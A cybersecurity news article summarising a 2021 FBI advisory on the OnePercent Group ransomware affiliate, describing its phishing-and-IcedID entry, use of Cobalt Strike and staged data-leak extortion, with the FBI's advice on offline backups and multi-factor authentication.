Ransomware: One Percent Makes A Big Impact

Uploaded on 2021-09-13 in GOVERNMENT-Law Enforcement, FREE TO VIEW

The US Federal Bureau of Investigations (FBI) has published its first-ever public advisory detailing the modus operandi of a ransomware affiliate. The warning concerning a criminal gang calling itself One Percent Group which has been targeting companies in the US since November 2020. 

The group’s method is to use the threat emulation software Cobalt Strike to perpetuate ransomware attacks. The infection process begins in the victim's inbox.

"OnePercent Group actors compromised victims through a phishing email in which an attachment is opened by the user," states the FBI warning. "The attachment's macros infect the system with the IcedID banking trojan."

The FBI warning uses a new term 'ransomware affiliate' to describe One Percent, referring  to a person or group who rent access to Ransomware-as-a-Service (RaaS) platforms', to orchestrates intrusions into corporate networks, encrypt files with the “rented ransomware,” and then earn a commission from successful extortions.

The malicious attachment appears as a zip file containing a Microsoft Word or Excel document. Once activated, the trojan downloads extra software onto the victim's computer, including Cobalt Strike, which the FBI said "moves laterally in the network, primarily with PowerShell removing."

The extortion/data leak typically follows these steps: 

Leak Warning:   After initially gaining access to a victim network, OnePercent Group actors leave a ransom note stating the data has been encrypted and exfiltrated. The note states the victim needs to contact the OnePercent Group actors on TOR or the victim data will be leaked. If the victim does not make prompt communication within a week of infection, the OnePercent Group actors follow up with emails and phone calls to the victim stating the data will be leaked. 

One Percent Leak:  If the victim does not pay the ransom quickly, the OnePercent Group actors threaten to release a portion of the stolen data to various clearnet websites. 

Full Leak:    If the ransom is not paid in full after the “one percent leak”, OnePercent Group actors threaten to sell the stolen data to the Sodinokibi Group to publish at an auction. 

The FBI said that OnePercent Group threat actors have been spotted entering a victim's network around a month before ransomware is deployed.   US companies are urged by the FBI to back-up their critical data offline and use multi-factor authentication with strong passphrases to protect themselves from ransomware attacks. 

IC3:        Bleeping Computer:          The Record:         Infosecurity Magazine

You Might Also Read: 

FBI & CISA Advice On Ransomware Attacks:

 

« Outdated Strategies In Maritime Cyber Security
Mēris Botnet Goes Global »

CyberSecurity Jobsite
Perimeter 81
Cyrin

Real Attacks. Real Tools. Real Scenarios.
Schedule a demo

Go Cyber

Training that transforms behaviours

Sign Up: Cyber Security Intelligence Newsletter

Directory of Suppliers

CSI Consulting Services

CSI Consulting Services

Get Advice From The Experts: * Training * Penetration Testing * Data Governance * GDPR Compliance. Connecting you to the best in the business.

Resecurity

Resecurity

Resecurity is a cybersecurity company that delivers a unified platform for endpoint protection, risk management, and cyber threat intelligence.

BackupVault

BackupVault

BackupVault is a leading provider of automatic cloud backup and critical data protection against ransomware, insider attacks and hackers for businesses and organisations worldwide.

MIRACL

MIRACL

MIRACL provides the world’s only single step Multi-Factor Authentication (MFA) which can replace passwords on 100% of mobiles, desktops or even Smart TVs.

CYRIN

CYRIN

CYRIN® Cyber Range. Real Tools, Real Attacks, Real Scenarios. See why leading educational institutions and companies in the U.S. have begun to adopt the CYRIN® system.

British Assessment Bureau

British Assessment Bureau

The British Assessment Bureau is an ISO certification body. We check conformity and compliance of companies to recognised ISO standards including ISO 27001.

Veridify Security

Veridify Security

Veridify Security (formerly SecureRF), develops and licenses quantum-resistant, public-key security tools for the low-resource processors powering the Internet of Things.

Wilson Sonsini Goodrich & Rosati (WSGR)

Wilson Sonsini Goodrich & Rosati (WSGR)

WSGR is the premier provider of legal services to technology, life sciences, and growth enterprises worldwide. Practice areas include cybersecurity and data protection.

Namogoo

Namogoo

Namogoo’s disruptive technology identifies and blocks unauthorized product ads that are injected into customer web sessions by client-side Digital Malware.

Redjack

Redjack

Redjack is a cutting-edge network analytics company focused on enterprise and ISP security and intelligence solutions.

OneSpan

OneSpan

OneSpan (formerly Vasco Data Security) is a global leader in digital identity security, transaction security and business productivity.

TitanHQ

TitanHQ

TitanHQ offers ultimate protection from internet based threats and powerful Web filtering functionalities to SMBs, Service Providers and Education sectors around the World.

Idaptive

Idaptive

Idaptive delivers Next-Gen Access through a zero trust approach. Idaptive secures access everywhere with single sign-on, adaptive MFA, EMM and analytics.

Synectics Solutions

Synectics Solutions

Synectics deliver solutions for reducing risk, combating financial crime, and enabling organisations to meet their compliance and regulatory commitments.

Open Systems

Open Systems

Open Systems is a Secure Access Service Edge (SASE) pioneer delivering a complete solution to network and security.

SDG Corp

SDG Corp

SDG is a global cybersecurity, identity governance, risk consulting and advisory firm, addressing complex security, compliance and technology needs.

Tangible Security

Tangible Security

Tangible employs the most sophisticated cyber security tools and techniques available to protect our clients’ sensitive data, infrastructure and competitive advantage.

Brookcourt Solutions

Brookcourt Solutions

Brookcourt Solutions delivers cyber security, network monitoring technologies and managed security services to help secure and protect your organisation’s critical infrastructure.

Kordia

Kordia

Kordia is a leading provider of mission-critical technology solutions throughout Australasia. We have the most comprehensive cyber security offering in New Zealand.

Resourcive

Resourcive

Resourcive is the first Value Added Sourcing “VAS” consultancy. We deliver strategic IT sourcing solutions to mid-market and enterprise clients.

Miggo Security

Miggo Security

Miggo is the first Application Detection and Response (ADR) platform on a mission to stop application breaches.